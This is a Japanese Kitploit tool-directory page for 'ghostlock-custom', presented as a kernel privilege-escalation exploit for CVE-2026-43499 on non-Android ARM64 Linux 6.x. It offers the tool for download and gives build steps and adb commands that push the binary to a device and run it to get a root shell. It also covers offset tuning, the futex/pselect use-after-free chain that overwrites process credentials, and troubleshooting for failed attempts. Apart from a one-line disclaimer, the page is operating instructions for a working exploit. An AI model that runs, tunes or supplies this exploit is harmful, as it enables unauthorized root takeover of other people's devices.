Skip to content
KitploitKITPLOIT
ツールブログ
提出
ツールブログ
提出

ハッキング、侵入テスト、サイバーセキュリティツールをあなたのセキュリティアーセナルに!

Kitploitはハッキング、サイバーセキュリティ、ペネトレーションテストのツールディレクトリです。最新のプロジェクトアップデートを見つけて、脆弱性の発見、システム分析、テストの自動化、セキュリティの強化を行いましょう。

··フィード·お問い合わせ·プライバシー·© 2026 Kitploit

ツールディレクトリ

カテゴリ

すべてのカテゴリを見る
Loading categories
ghostlock-custom — GhostLock (CVE-2026-43499) の非Android Linux 6.x ARM64向け適応 | Kitploit
ツール/GitHubGitHub/xiaobailovesstirring/ghostlock-custom
特権昇格脆弱性分析エクスプロイトバイナリエクスプロイト
GitHubxiaobailovesstirring/ghostlock-custom

ghostlock-custom

GhostLock (CVE-2026-43499) の非Android Linux 6.x ARM64向け適応

リポジトリを見る

人気

すべて見る →

コミュニティで最も使われているツールを見つけましょう。

すべてのツールを探索

ツールコレクションを閲覧

すべてのツールを見る →
共有
0日前未レビュー

GhostLock Custom — CVE-2026-43499 対応版

非 Android Linux 6.x ARM64 カーネル向けの GhostLock (CVE-2026-43499) 権限昇格エクスプロイト。

カーネル特徴

項目値
アーキテクチャARM64 (AArch64)
VA_BITS39
KIMAGE_TEXT_BASE0xffffffc008000000
カーネルバージョン6.x
SELinuxなし
ashmemなし
configfsなし

ビルド

ローカルビルド (クロスコンパイラが必要)

root@kitploit:~
make

Android NDK ビルド

root@kitploit:~
make android-arm64 NDK=/path/to/android-ndk

GitHub Actions (クラウドビルド)

プッシュ後に自動でビルドがトリガーされ、artifact をダウンロードできます。

使用方法

root@kitploit:~
# ターゲットデバイスへプッシュ
adb push ghostlock-arm64 /data/local/tmp/e
adb shell chmod 755 /data/local/tmp/e

# root シェルを取得
adb shell /data/local/tmp/e --shell

# pselect オフセットを調整 (デフォルト値が動作しない場合)
adb shell PSELECT_SHIFT=-4 /data/local/tmp/e --shell
adb shell PSELECT_SHIFT=-2 /data/local/tmp/e --shell
adb shell PSELECT_SHIFT=0 /data/local/tmp/e --shell
adb shell PSELECT_SHIFT=2 /data/local/tmp/e --shell
adb shell PSELECT_SHIFT=4 /data/local/tmp/e --shell

# 物理ロードアドレスを指定
adb shell KPHYS=0x80000000 /data/local/tmp/e --shell

環境変数

権限昇格の原理

  1. futex PI レース: FUTEX_CMP_REQUEUE_PI が remove_waiter() の UAF をトリガー
  2. pselect スタックオーバーフロー: 解放された rt_mutex_waiter が stack_fds バッファに配置される
  3. PI ツリー書き込み: 細工した fake waiter により任意カーネルアドレスへの書き込みを実現
  4. cred の上書き: task_struct->cred を init_cred で上書き

適合に関する説明

このバージョンは ghostlock-oneplus を基に簡素化されています:

  • SELinux 無効化コードを削除 (このカーネルには SELinux がない)
  • ashmem/configfs 関連コードを削除 (このカーネルにはこれらのコンポーネントがない)
  • KernelSU インストールコードを削除
  • SLIDE KASLR リークを削除 (loggers/nfulnl_logger がない)
  • Android 専用コード (miniADB など) を削除

トラブルシューティング

免責事項

本ツールはセキュリティ研究のみを目的としています。使用者はすべての責任を負うものとします。

ツールをダウンロード
変数
デフォルト値
説明
PSELECT_SHIFT-2pselect waiter のスタック上のオフセット調整
KPHYS0x80000000カーネル物理ロードアドレス
KIMAGE_TEXT_BASE0xffffffc008000000カーネル仮想ベースアドレス
現象考えられる原因解決方法
デバイスが再起動するPSELECT_SHIFT が誤っている-4 から +4 まで順に試す
効果がないKPHYS が誤っている/proc/iomem の正しい値を確認する
perf_event_open failedseccomp 制限ADB シェル経由で実行してみる
root になれないオフセットが一致しないカーネルバージョンを確認し、TASK_CRED_OFF をチェックする